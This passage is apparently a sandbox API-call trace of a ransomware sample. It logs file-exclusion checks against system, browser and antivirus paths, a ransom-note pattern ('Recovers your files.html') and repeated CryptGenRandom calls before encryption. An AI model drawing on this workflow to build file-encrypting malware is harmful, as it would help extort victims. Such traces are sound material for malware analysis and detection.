[0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*Atheros*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*Realtek*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*bootmgr*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*boot*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*boot*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*IO.SYS*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*ntldr*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*chrome*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*opera*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*firefox*") returned 0 [0143.271] wcslen (_String="\\\\?\\") returned 0x4 [0143.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0x8be638 [0143.273] wcscmp (_String1=".", _String2=".") returned 0 [0143.273] FindNextFileW (in: hFindFile=0x8be638, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.273] wcscmp (_String1="..", _String2=".") returned 1 [0143.273] wcscmp (_String1="..", _String2="..") returned 0 [0143.273] FindNextFileW (in: hFindFile=0x8be638, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0143.273] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*NMCRYPT") returned 0 [0143.273] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*Recovers your files.html") returned 0 [0143.273] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*.exe") returned 0 [0143.273] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*.dll") returned 0 [0143.273] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*.lnk") returned 0 [0143.273] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*.bat") returned 0 [0143.273] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*.ini") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*.msi") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*.scf") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*pagefile.sys*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*NTUSER.DAT*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*AppData*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\winrar\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\java\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\TeamViewer\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\windows\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\ESET\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\AVG\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\AVIRA\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*\\AVAST Software\\*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*Atheros*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*Realtek*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*bootmgr*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*boot*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*boot*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*CONFIG.SYS*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*IO.SYS*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*MSDOS.SYS*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*NTDETECT.COM*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*ntldr*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*chrome*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*opera*") returned 0 [0143.274] PathMatchSpecW (pszFile="MSADDNDR.OLB", pszSpec="*firefox*") returned 0 [0143.274] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", pszSpec="*") returned 1 [0143.274] strlen (_Str="NMoreira") returned 0x8 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: 